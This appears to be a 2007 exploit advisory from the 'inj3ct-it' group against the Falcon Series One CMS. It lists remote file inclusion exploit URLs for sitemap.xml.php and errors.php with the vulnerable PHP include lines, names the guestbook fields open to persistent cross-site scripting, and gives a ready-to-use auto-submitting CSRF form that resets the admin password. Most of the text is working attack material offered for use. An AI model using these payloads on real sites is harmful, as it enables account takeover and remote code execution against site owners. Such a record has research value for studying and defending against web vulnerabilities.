---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |_______    _____/  |_          /_   |/  |_
 |   |/        |  | _(__  <_/ ___   __  ______  |      __
 |   |   |     |  |/         ___|  |   /_____/  |   ||  | 
 |___|___|  /__|  /______  /___  >__|            |___||__| 
          /______|      /     /                          
---------------------------------------------------------------
Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org 
---------------------------------------------------------------
  Multilple Remote File Inclusion - Permanent Xss
---------------------------------------------------------------
# Author: MhZ91
# Title: Falcon Series One - Multilple Remote File Inclusion + Permanent Xss
# Download: http://sourceforge.net/projects/falconcms/
# Bug: Multilple Remote File Inclusion + Permanent Xss
# Severity: High
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
Exploit: http://[site]/sitemap.xml.php?dir[classes]=[Evil_Code]
Vuln code: @include_once ($dir['classes']."class.pages.php");
---------------------------------------------------------------
Exploit: http://[site]/errors.php?error=[Evil_Code]
Vuln code: <?include($_REQUEST["error"] . "/errors.php");?>
---------------------------------------------------------------
Permanent Xss at http://[site]/index.php?guestbook=v in the input gb_mail, gb_name and textarea gb_text your [Xss] and after the xss work here index.php?guestbook=v :p
---------------------------------------------------------------
Simple 1337 Csrf exploit:
<form name="form_change" action="http://[site]/index.php?admin=changepass" method="post">
<input type="hidden" name="f_pass" class="field" value="[YourPWD]" />
<input type="hidden" name="f_pass2" class="field" value="[YourPWD]" />
</form><script>document.form_change.submit()</script>
There is other more csrf and permanent xss.. 

# www.Syue.com [2007-12-10]